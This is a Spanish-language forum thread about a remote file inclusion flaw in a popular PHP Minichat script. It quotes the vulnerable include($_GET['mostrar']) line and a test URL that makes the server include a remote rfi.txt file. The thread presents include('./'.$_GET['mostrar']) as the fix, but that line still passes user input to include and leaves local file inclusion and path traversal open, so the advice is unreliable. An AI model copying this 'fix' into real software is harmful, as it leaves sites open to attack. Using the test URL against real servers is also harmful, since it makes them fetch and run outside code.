PHP - El Famoso Minichat

Seguramente todos conocen el Minichat PHP que circula en la Web, que sirve para "Incrustarlo" en nuestras web y proveer Chat muy facilmente.
Ahora, seguro también conocen la vulnerabilidad que utilizan estas lacras conocidas como "Hackers" para arruinarnos los mensajes de nuestros visitantes (Incluyendo ficheros remotos).

Para quienes sepan a que me refiero, Hay alguna forma se corregir esta vulnerabilidad? Yo solo recuerdo que utilizan el método Mostrar del mismo chat e incluyen un fichero propio...

Gracias de antemano, y si soy poco claro pido disculpas. Cualquier ayuda es de utilidad.

¿Que es esto?
El bug* basicamente funciona incluyendo un archivo (shell) que tiene codigos para modificar nuestra web desde dentro, el MC con el bug que tiene permite introducir este archivo y por tanto tu web en el servidor es vulnerable.

¿Como evitarlo?
Hay muchas formas, una puede ser Contactar con tu Proveedor de Hosting y comentarle el problema, este se encargará de anular varios parametros del php.ini que permiten incluir archivos externos al servidor en tu web.

Otra forma para evitar el RFI podría ser crear tu mismo un codigo que impida introducir, EN EL MINICHAT, cualquier archivo que no pertenezca a los originales del MC.

Trás probar el codigo... He deducido que no FUNCIONA!!! Risitas
Realmente impide el RFI pero es que no impide solamente eso sino que impide que se incluya cualquier archivo...

Yo me he dado cuenta que la solución era tan sencilla como:
include("./".$_GET['mostrar']);

Por tanto, debeis substituir la linea:
<? include($_GET['mostrar']); ?>
Por esta otra:
include("./".$_GET['mostrar']);

Probadlo si quereis haciendo lo siguiente:
http://www.tuweb.com/carpetaMC/ftag.php?mostrar=http://www.phperos.net/rfi.txt